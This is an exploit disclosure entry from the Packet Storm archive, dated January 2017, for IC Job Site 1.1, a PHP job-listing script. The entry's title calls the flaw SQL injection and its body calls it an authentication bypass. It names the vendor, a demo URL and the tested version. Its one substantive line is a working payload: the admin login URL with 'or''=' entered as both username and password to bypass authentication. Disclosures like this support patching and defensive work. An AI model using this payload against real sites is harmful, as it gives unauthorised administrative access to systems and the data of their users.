IC Job Site 1.1 SQL Injection

2017-01-21T00:00:00
ID PACKETSTORM:140648
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-01-21T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: ICJobSite-Job Site PHP Script - Authentication Bypass  
# Google Dork: N/A  
# Date: 20.01.2017  
# Vendor Homepage: http://www.icloudcenter.com/  
# Software Buy: http://www.icloudcenter.com/jobs-site-script.htm  
# Demo: http://icloudcenter.net/demos/icjobsite/  
# Version: 1.1  
# Tested on: Win7 x64  
# # # # #   
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Mail : ihsan[beygir]ihsan[nokta]net  
# # # # #  
# Exploit :  
# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.  
# # # # #  
  
`